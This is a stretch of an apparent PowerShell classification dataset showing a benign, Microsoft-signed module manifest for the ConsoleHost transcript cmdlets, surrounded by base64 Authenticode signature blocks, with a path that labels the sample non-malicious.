# rnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4Ddato88tt8zpcoRb0Rrrg
# OGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+lD3v++MrWhAfTVYoonpy
# 4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nkkDstrjNYxbc+/jLTswM9
# sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6A4aN91/w0FK/jJSHvMAh
# dCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmdX4jiJV3TIUs+UsS1Vz8k
# A/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL5zmhD+kjSbwYuER8ReTB
# w3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zdsGbiwZeBe+3W7UvnSSmn
# Eyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3T8HhhUSJxAlMxdSlQy90
# lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS4NaIjAsCAwEAAaOCAe0w
# ggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRIbmTlUAXTgqoXNzcitW2o
# ynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMCAYYwDwYD
# VR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBDuRQFTuHqp8cx0SOJNDBa
# BgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20vcGtpL2Ny
# bC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3JsMF4GCCsG
# AQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3dy5taWNyb3NvZnQuY29t
# L3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3J0MIGfBgNV
# HSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEFBQcCARYzaHR0cDovL3d3
# dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1hcnljcHMuaHRtMEAGCCsG
# AQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkAYwB5AF8AcwB0AGEAdABl
# AG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn8oalmOBUeRou09h0ZyKb
# C5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7v0epo/Np22O/IjWll11l
# hJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0bpdS1HXeUOeLpZMlEPXh6
# I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/KmtYSWMfCWluWpiW5IP0
# wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvyCInWH8MyGOLwxS3OW560
# STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBpmLJZiWhub6e3dMNABQam
# ASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJihsMdYzaXht/a8/jyFqGa
# J+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYbBL7fQccOKO7eZS/sl/ah
# XJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbSoqKfenoi+kiVH6v7RyOA
# 9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sLgOppO6/8MO0ETI7f33Vt
# Y5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtXcVZOSEXAQsmbdlsKgEhr
# /Xmfwb1tbWrJUnMTDXpQzTGCGiMwghofAgEBMIGVMH4xCzAJBgNVBAYTAlVTMRMw
# EQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVN
# aWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNp
# Z25pbmcgUENBIDIwMTECEzMAAAQEbHQG/1crJ3IAAAAABAQwDQYJYIZIAWUDBAIB
# BQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQwHAYKKwYBBAGCNwIBCzEO
# MAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEICI4ARdWq2a59YcdmCx8cDoe
# 31vJ98z89JmlbSJ6InZ+MEIGCisGAQQBgjcCAQwxNDAyoBSAEgBNAGkAYwByAG8A
# cwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20wDQYJKoZIhvcNAQEB
# BQAEggEAr95fSiA4+X6RY5F0t1gY/lLWA6jPysYDfdExLkYpfhmrSQ6U6mqla38J
# 7hvvfhj6jJxRhl/xtNUB4vg7wi2GEJC+6pOPTUdx1gPKirLHEzxuZso/eqnid9CJ
# 2opit6J6Qcv5QzIEnSP61brm/PpU4TqU1utD1czueMqdwn67/i0kzMbxVj2L+o/Z
# 2mbWvkPlpa1CbM78cJxiUKN4PJ7Fuogd3MACq3poZEPooNSvZBNVy4SHpeIGTUTk
# /Uw14gOyItkCOa+6QNrOU7E6hAgGsyKNrcpC2JYOtPtzbAjgCY2/4J/17VO49jl/
# 8yrOLAjn2Ntbe1ebiQ+rkXOoFIXcEKGCF60wghepBgorBgEEAYI3AwMBMYIXmTCC
# F5UGCSqGSIb3DQEHAqCCF4YwgheCAgEDMQ8wDQYJYIZIAWUDBAIBBQAwggFaBgsq
# hkiG9w0BCRABBKCCAUkEggFFMIIBQQIBAQYKKwYBBAGEWQoDATAxMA0GCWCGSAFl
# AwQCAQUABCCi6aPse+ZBGHtZ55DXpzpGx7leeYm2/ww9HAXn2uzl8AIGZutgsUoo
# GBMyMDI0MTAyODExNDA0NC40NTRaMASAAgH0oIHZpIHWMIHTMQswCQYDVQQGEwJV
# UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UE
# ChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMS0wKwYDVQQLEyRNaWNyb3NvZnQgSXJl
# bGFuZCBPcGVyYXRpb25zIExpbWl0ZWQxJzAlBgNVBAsTHm5TaGllbGQgVFNTIEVT
# Tjo1OTFBLTA1RTAtRDk0NzElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUtU3RhbXAg
# U2VydmljZaCCEfswggcoMIIFEKADAgECAhMzAAAB9BdGhcDLPznlAAEAAAH0MA0G
# CSqGSIb3DQEBCwUAMHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9u
# MRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRp
# b24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwMB4XDTI0
# MDcyNTE4MzA1OVoXDTI1MTAyMjE4MzA1OVowgdMxCzAJBgNVBAYTAlVTMRMwEQYD
# VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy
# b3NvZnQgQ29ycG9yYXRpb24xLTArBgNVBAsTJE1pY3Jvc29mdCBJcmVsYW5kIE9w
# ZXJhdGlvbnMgTGltaXRlZDEnMCUGA1UECxMeblNoaWVsZCBUU1MgRVNOOjU5MUEt
# MDVFMC1EOTQ3MSUwIwYDVQQDExxNaWNyb3NvZnQgVGltZS1TdGFtcCBTZXJ2aWNl
# MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEApwhOE6bQgC9qq4jJGX2A
# 1yoObfk0qetQ8kkj+5m37WBxDlsZ5oJnjfzHspqPiOEVzZ2y2ygGgNZ3/xdZQN7f
# 9A1Wp1Adh5qHXZZh3SBX8ABuc69Tb3cJ5KCZcXDsufwmXeCj81EzJEIZquVdV8ST
# lQueB/b1MIYt5RKis3uwzdlfSl0ckHbGzoO91YTKg6IExqKYojGreCopnIKxOvkr
# 5VZsj2f95Bb1LGEvuhBIm/C7JysvJvBZWNtrspzyXVnuo+kDEyZwpkphsR8Zvdi+
# s/pQiofmdbW1UqzWlqXQVgoYXbaYkEyaSh/heBtwj1tue+LcuOcHAPgbwZvQLksK
# aK46oktregOR4e0icsGiAWR9IL+ny4mlCUNA84F7GEEWOEvibig7wsrTa6ZbzuMs
# yTi2Az4qPV3QRkFgxSbp4R4OEKnin8Jz4XLI1wXhBhIpMGfA3BT850nqamzSiD5L
# 5px+VtfCi0MJTS2LDF1PaVZwlyVZIVjVHK8oh2HYG9T26FjR9/I85i5ExxmhHpxM
# 2Z+UhJeZA6Lz452m/+xrA4xrdYas5cm7FUhy24rPLVH+Fy+ZywHAp9c9oWTrtjfI
# KqLIvYtgJc41Q8WxbZPR7B1uft8BFsvz2dOSLkxPDLcXWy16ANy73v0ipCxAwUEC
# 9hssi0LdB8ThiNf/4A+RZ8sCAwEAAaOCAUkwggFFMB0GA1UdDgQWBBQrdGWhCtEs
# Pid1LJzsTaLTKQbfmzAfBgNVHSMEGDAWgBSfpxVdAF5iXYP05dJlpxtTNRnpcjBf
# BgNVHR8EWDBWMFSgUqBQhk5odHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20vcGtpb3Bz
# L2NybC9NaWNyb3NvZnQlMjBUaW1lLVN0YW1wJTIwUENBJTIwMjAxMCgxKS5jcmww
# bAYIKwYBBQUHAQEEYDBeMFwGCCsGAQUFBzAChlBodHRwOi8vd3d3Lm1pY3Jvc29m
# dC5jb20vcGtpb3BzL2NlcnRzL01pY3Jvc29mdCUyMFRpbWUtU3RhbXAlMjBQQ0El
# MjAyMDEwKDEpLmNydDAMBgNVHRMBAf8EAjAAMBYGA1UdJQEB/wQMMAoGCCsGAQUF
# BwMIMA4GA1UdDwEB/wQEAwIHgDANBgkqhkiG9w0BAQsFAAOCAgEA3cHSDxJKUDsg
# acIfRX60ugODShsBqwtEURUbUXeDmYYSa5oFj34RujW3gOeCt/ObDO45vfpnYG5O
# S5YowwsFw19giCI6JV+ccG/qqM08nxASbzwWtqtorzQiJh9upsE4TVZeKYXmbyx7
# WN9tdbVIrCelVj7P6ifMHTSLt6BmyoS2xlC2cfgKPPA13vS3euqUl6zwe7GAhjfj
# NXjKlE4SNWJvdqgrv0GURKjqmamNvhmSJane6TYzpdDCegq8adlGH85I1EWKmfER
# b1lzKy5OMO2e9IkAlvydpUun0C3sNEtp0ehliT0Sraq8jcYVDH4A2C/MbLBIwikj
# wiFGQ4SlFLT2Tgb4GvvpcWVzBxwDo9IRBwpzngbyzbhh95UVOrQL2rbWHrHDSE3d
# gdL2yuaHRgY7HYYLs5Lts30wU9Ouh8N54RUta6GFZFx5A4uITgyJcVdWVaN0qjs0
# eEjwEyNUv0cRLuHWJBejkMe3qRAhvCjnhro7DGRWaIldyfzZqln6FsnLQ3bl+ZvV
# JWTYJuL+IZLI2Si3IrIRfjccn29X2BX/vz2KcYubIjK6XfYvrZQN4XKbnvSqBNAw
# IPY2xJeB4o9PDEFI2rcPaLUyz5IV7JP3JRpgg3xsUqvFHlSG6uMIWjwH0GQIIwrC
# 2zRy+lNZsOKnruyyHMQTP7jy5U92qEEwggdxMIIFWaADAgECAhMzAAAAFcXna54C
# m0mZAAAAAAAVMA0GCSqGSIb3DQEBCwUAMIGIMQswCQYDVQQGEwJVUzETMBEGA1UE
# CBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9z
# b2Z0IENvcnBvcmF0aW9uMTIwMAYDVQQDEylNaWNyb3NvZnQgUm9vdCBDZXJ0aWZp
# Y2F0ZSBBdXRob3JpdHkgMjAxMDAeFw0yMTA5MzAxODIyMjVaFw0zMDA5MzAxODMy
# MjVaMHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQH
# EwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xJjAkBgNV
# BAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwMIICIjANBgkqhkiG9w0B
# AQEFAAOCAg8AMIICCgKCAgEA5OGmTOe0ciELeaLL1yR5vQ7VgtP97pwHB9KpbE51
# yMo1V/YBf2xK4OK9uT4XYDP/XE/HZveVU3Fa4n5KWv64NmeFRiMMtY0Tz3cywBAY
# 6GB9alKDRLemjkZrBxTzxXb1hlDcwUTIcVxRMTegCjhuje3XD9gmU3w5YQJ6xKr9
# cmmvHaus9ja+NSZk2pg7uhp7M62AW36MEBydUv626GIl3GoPz130/o5Tz9bshVZN
# 7928jaTjkY+yOSxRnOlwaQ3KNi1wjjHINSi947SHJMPgyY9+tVSP3PoFVZhtaDua
# Rr3tpK56KTesy+uDRedGbsoy1cCGMFxPLOJiss254o2I5JasAUq7vnGpF1tnYN74
# kpEeHT39IM9zfUGaRnXNxF803RKJ1v2lIH1+/NmeRd+2ci/bfV+AutuqfjbsNkz2
# K26oElHovwUDo9Fzpk03dJQcNIIP8BDyt0cY7afomXw/TNuvXsLz1dhzPUNOwTM5
# TI4CvEJoLhDqhFFG4tG9ahhaYQFzymeiXtcodgLiMxhy16cg8ML6EgrXY28MyTZk
# i1ugpoMhXV8wdJGUlNi5UPkLiWHzNgY1GIRH29wb0f2y1BzFa/ZcUlFdEtsluq9Q
# BXpsxREdcu+N+VLEhReTwDwV2xo3xwgVGD94q0W29R6HXtqPnhZyacaue7e3Pmri
# Lq0CAwEAAaOCAd0wggHZMBIGCSsGAQQBgjcVAQQFAgMBAAEwIwYJKwYBBAGCNxUC
# BBYEFCqnUv5kxJq+gpE8RjUpzxD/LwTuMB0GA1UdDgQWBBSfpxVdAF5iXYP05dJl
# pxtTNRnpcjBcBgNVHSAEVTBTMFEGDCsGAQQBgjdMg30BATBBMD8GCCsGAQUFBwIB
# FjNodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20vcGtpb3BzL0RvY3MvUmVwb3NpdG9y
# eS5odG0wEwYDVR0lBAwwCgYIKwYBBQUHAwgwGQYJKwYBBAGCNxQCBAweCgBTAHUA
# YgBDAEEwCwYDVR0PBAQDAgGGMA8GA1UdEwEB/wQFMAMBAf8wHwYDVR0jBBgwFoAU
# 1fZWy4/oolxiaNE9lJBb186aGMQwVgYDVR0fBE8wTTBLoEmgR4ZFaHR0cDovL2Ny
# bC5taWNyb3NvZnQuY29tL3BraS9jcmwvcHJvZHVjdHMvTWljUm9vQ2VyQXV0XzIw
# MTAtMDYtMjMuY3JsMFoGCCsGAQUFBwEBBE4wTDBKBggrBgEFBQcwAoY+aHR0cDov
# L3d3dy5taWNyb3NvZnQuY29tL3BraS9jZXJ0cy9NaWNSb29DZXJBdXRfMjAxMC0w
# Ni0yMy5jcnQwDQYJKoZIhvcNAQELBQADggIBAJ1VffwqreEsH2cBMSRb4Z5yS/yp
# b+pcFLY+TkdkeLEGk5c9MTO1OdfCcTY/2mRsfNB1OW27DzHkwo/7bNGhlBgi7ulm
# ZzpTTd2YurYeeNg2LpypglYAA7AFvonoaeC6Ce5732pvvinLbtg/SHUB2RjebYIM
# 9W0jVOR4U3UkV7ndn/OOPcbzaN9l9qRWqveVtihVJ9AkvUCgvxm2EhIRXT0n4ECW
# OKz3+SmJw7wXsFSFQrP8DJ6LGYnn8AtqgcKBGUIZUnWKNsIdw2FzLixre24/LAl4
# FOmRsqlb30mjdAy87JGA0j3mSj5mO0+7hvoyGtmW9I/2kQH2zsZ0/fZMcm8Qq3Uw
# xTSwethQ/gpY3UA8x1RtnWN0SCyxTkctwRQEcb9k+SS+c23Kjgm9swFXSVRk2XPX
# fx5bRAGOWhmRaw2fpCjcZxkoJLo4S5pu+yFUa2pFEUep8beuyOiJXk+d0tBMdrVX
# VAmxaQFEfnyhYWxz/gq77EFmPWn9y8FBSX5+k77L+DvktxW/tM4+pTFRhLy/AsGC
# onsXHRWJjXD+57XQKBqJC4822rpM+Zv/Cuk0+CQ1ZyvgDbjmjJnW4SLq8CdCPSWU
# 5nR0W2rRnj7tfqAxM328y+l7vzhwRNGQ8cirOoo6CGJ/2XBjU02N7oJtpQUQwXEG
# ahC0HVUzWLOhcGbyoYIDVjCCAj4CAQEwggEBoYHZpIHWMIHTMQswCQYDVQQGEwJV
# UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UE
# ChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMS0wKwYDVQQLEyRNaWNyb3NvZnQgSXJl
# bGFuZCBPcGVyYXRpb25zIExpbWl0ZWQxJzAlBgNVBAsTHm5TaGllbGQgVFNTIEVT
# Tjo1OTFBLTA1RTAtRDk0NzElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUtU3RhbXAg
# U2VydmljZaIjCgEBMAcGBSsOAwIaAxUAv+LZ/Vg0s17Xek4iG9R9c/7+AI6ggYMw
# gYCkfjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UE
# BxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYD
# VQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDANBgkqhkiG9w0BAQsF
# AAIFAOrJ784wIhgPMjAyNDEwMjgxMTExMTBaGA8yMDI0MTAyOTExMTExMFowdDA6
# BgorBgEEAYRZCgQBMSwwKjAKAgUA6snvzgIBADAHAgEAAgIRQTAHAgEAAgITcjAK
# AgUA6stBTgIBADA2BgorBgEEAYRZCgQCMSgwJjAMBgorBgEEAYRZCgMCoAowCAIB
# AAIDB6EgoQowCAIBAAIDAYagMA0GCSqGSIb3DQEBCwUAA4IBAQAhvpi0fcwW36Vj
# kxJvXWTKNHB3jvDpp2sJGsfeVTvr0wqWqBrbYtmbUuVe97LNopMBBaWBVq2RlfPa
# sIxDtxHDTn5LPhbHb5DWH/NZWb+28zXE1+Y5sevsEdvsFxcDLB5CurWs+Z+iXqcd
# rGqWwlcV+WX6dpuy3/dPiBzA5ZYhHiQgBr6+GCyDGjEB9T76pHsFqwSZHJ4+hXZB
# 9EMgikB45MhUWxkF4tLdq1JMiZWtZmjsOTbveG4Y338S6Qpt3I6sMkaFL+Dn9fLJ
# wn4WwMtfXG/6gRGDUIlgE+If7xvhMCC+iUcbAyLLjXkn+yis2mNx8vI42scFI8SU
# P7qoQ0p/MYIEDTCCBAkCAQEwgZMwfDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldh
# c2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBD
# b3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIw
# MTACEzMAAAH0F0aFwMs/OeUAAQAAAfQwDQYJYIZIAWUDBAIBBQCgggFKMBoGCSqG
# SIb3DQEJAzENBgsqhkiG9w0BCRABBDAvBgkqhkiG9w0BCQQxIgQgBBe+hHeHQT9Y
# dNX8EHWR8lBBk8BWBwVYC3GVs9y9jvswgfoGCyqGSIb3DQEJEAIvMYHqMIHnMIHk
# MIG9BCA/WMJ8biaT6njvkknB8Q7hSQIi8ys6vIBvZg60RBjWazCBmDCBgKR+MHwx
# CzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRt
# b25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xJjAkBgNVBAMTHU1p
# Y3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwAhMzAAAB9BdGhcDLPznlAAEAAAH0
# MCIEIGm6buvOuOZ0hj0c+A3dmkblkgOGsbCdq3o77OaNJ5IJMA0GCSqGSIb3DQEB
# CwUABIICAHaUlFlLC+2a/7/ZoCq8Jh/PXnp+3Mk6Gd6vV4TjJL7bWUi1IVgGkUSQ
# 3p1rVoojBWDyEn8BnM+IokZceyklH2ANcRe5eoYxEYo8zL6fLQJqMRHwchv4g/Xl
# AtrsR3qb+6jNQEmhi4/vaJUQ81+PP2cSMawXkgpupmp8q3aF4BkXJw3MPZhvZwOJ
# yA+mo3LSNKUMsc4d7VQfq3geOg9riRrqkI68wOPGcCjPFMZnXdSmlfZSIt2T8u9m
# XAiBMpTE8gyWVEyp1lbuB6XVYbJ66yQPodjLg6wyhDzof82c0c1dhobEMKt4tcCZ
# TRNoymu9eA4Od5xQWCiFPzbo5RY+XFbAteR7lq3SKXYSAfB6BYwOFEWrIcHaVVpl
# xGYlTXoEalz7elriqWCh+YvqwAJd9goEABpGppN0Hv+2KaGXiUeL1eUkuuwCVjhK
# J+1UQfABmOK0Gp76OXemh6tjJ8M8abPRmIIAGBjx6cdUKSLGEIltO3bcXV8VnUHY
# xUnZmPP4noB00qrNO8lHV9/tiJesEKrPDfaFY/Betk5FChHNBt8BJ+HI5zC0luLO
# 3EuyhUIzS1Ccnj4RogNH5NOzefur1NEUFJtHAN/+7DloStyqfIOoqbk9orh2H1SL
# AZxeoaJGD+C+RFx8N45t1I0nVrbu+GSkUgF7VctfZlPOt2t0VplV
# SIG # End signature block
|
combined_dataset/train/non-malicious/sample_66_20.ps1
|
sample_66_20.ps1
|
@{
GUID="56D66100-99A0-4FFC-A12D-EEE9A6718AEF"
Author="PowerShell"
CompanyName="Microsoft Corporation"
Copyright="Copyright (c) Microsoft Corporation."
ModuleVersion="7.0.0.0"
CompatiblePSEditions = @("Core")
PowerShellVersion="3.0"
FunctionsToExport = @()
CmdletsToExport="Start-Transcript", "Stop-Transcript"
AliasesToExport = @()
NestedModules="Microsoft.PowerShell.ConsoleHost.dll"
HelpInfoURI = 'https://aka.ms/powershell73-help'
}
# SIG # Begin signature block
# MIIoKgYJKoZIhvcNAQcCoIIoGzCCKBcCAQExDzANBglghkgBZQMEAgEFADB5Bgor
# BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG
# KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCAnP1N0u4LwBxwF
# d9zywYPVxne8txtxEVOGYYLvtsP2kKCCDXYwggX0MIID3KADAgECAhMzAAADrzBA
# DkyjTQVBAAAAAAOvMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD
# VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy
# b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p
# bmcgUENBIDIwMTEwHhcNMjMxMTE2MTkwOTAwWhcNMjQxMTE0MTkwOTAwWjB0MQsw
# CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u
# ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy
# b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB
# AQDOS8s1ra6f0YGtg0OhEaQa/t3Q+q1MEHhWJhqQVuO5amYXQpy8MDPNoJYk+FWA
# hePP5LxwcSge5aen+f5Q6WNPd6EDxGzotvVpNi5ve0H97S3F7C/axDfKxyNh21MG
# 0W8Sb0vxi/vorcLHOL9i+t2D6yvvDzLlEefUCbQV/zGCBjXGlYJcUj6RAzXyeNAN
# xSpKXAGd7Fh+ocGHPPphcD9LQTOJgG7Y7aYztHqBLJiQQ4eAgZNU4ac6+8LnEGAL
# go1ydC5BJEuJQjYKbNTy959HrKSu7LO3Ws0w8jw6pYdC1IMpdTkk2puTgY2PDNzB
# tLM4evG7FYer3WX+8t1UMYNTAgMBAAGjggFzMIIBbzAfBgNVHSUEGDAWBgorBgEE
# AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQURxxxNPIEPGSO8kqz+bgCAQWGXsEw
# RQYDVR0RBD4wPKQ6MDgxHjAcBgNVBAsTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEW
# MBQGA1UEBRMNMjMwMDEyKzUwMTgyNjAfBgNVHSMEGDAWgBRIbmTlUAXTgqoXNzci
# tW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8vd3d3Lm1pY3Jvc29mdC5j
# b20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3JsMGEG
# CCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDovL3d3dy5taWNyb3NvZnQu
# Y29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3J0
# MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIBAISxFt/zR2frTFPB45Yd
# mhZpB2nNJoOoi+qlgcTlnO4QwlYN1w/vYwbDy/oFJolD5r6FMJd0RGcgEM8q9TgQ
# 2OC7gQEmhweVJ7yuKJlQBH7P7Pg5RiqgV3cSonJ+OM4kFHbP3gPLiyzssSQdRuPY
# 1mIWoGg9i7Y4ZC8ST7WhpSyc0pns2XsUe1XsIjaUcGu7zd7gg97eCUiLRdVklPmp
# XobH9CEAWakRUGNICYN2AgjhRTC4j3KJfqMkU04R6Toyh4/Toswm1uoDcGr5laYn
# TfcX3u5WnJqJLhuPe8Uj9kGAOcyo0O1mNwDa+LhFEzB6CB32+wfJMumfr6degvLT
# e8x55urQLeTjimBQgS49BSUkhFN7ois3cZyNpnrMca5AZaC7pLI72vuqSsSlLalG
# OcZmPHZGYJqZ0BacN274OZ80Q8B11iNokns9Od348bMb5Z4fihxaBWebl8kWEi2O
# PvQImOAeq3nt7UWJBzJYLAGEpfasaA3ZQgIcEXdD+uwo6ymMzDY6UamFOfYqYWXk
# ntxDGu7ngD2ugKUuccYKJJRiiz+LAUcj90BVcSHRLQop9N8zoALr/1sJuwPrVAtx
# HNEgSW+AKBqIxYWM4Ev32l6agSUAezLMbq5f3d8x9qzT031jMDT+sUAoCw0M5wVt
# CUQcqINPuYjbS1WgJyZIiEkBMIIHejCCBWKgAwIBAgIKYQ6Q0gAAAAAAAzANBgkq
# hkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x
# EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv
# bjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5
# IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEwOTA5WjB+MQswCQYDVQQG
# EwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwG
# A1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYDVQQDEx9NaWNyb3NvZnQg
# Q29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIIC
# CgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+laUKq4BjgaBEm6f8MMHt03
# a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc6Whe0t+bU7IKLMOv2akr
# rnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4Ddato88tt8zpcoRb0Rrrg
# OGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+lD3v++MrWhAfTVYoonpy
# 4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nkkDstrjNYxbc+/jLTswM9
# sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6A4aN91/w0FK/jJSHvMAh
# dCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmdX4jiJV3TIUs+UsS1Vz8k
# A/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL5zmhD+kjSbwYuER8ReTB
# w3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zdsGbiwZeBe+3W7UvnSSmn
# Eyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3T8HhhUSJxAlMxdSlQy90
# lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS4NaIjAsCAwEAAaOCAe0w
# ggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRIbmTlUAXTgqoXNzcitW2o
# ynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMCAYYwDwYD
# VR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBDuRQFTuHqp8cx0SOJNDBa
# BgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20vcGtpL2Ny
# bC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3JsMF4GCCsG
# AQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3dy5taWNyb3NvZnQuY29t
# L3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3J0MIGfBgNV
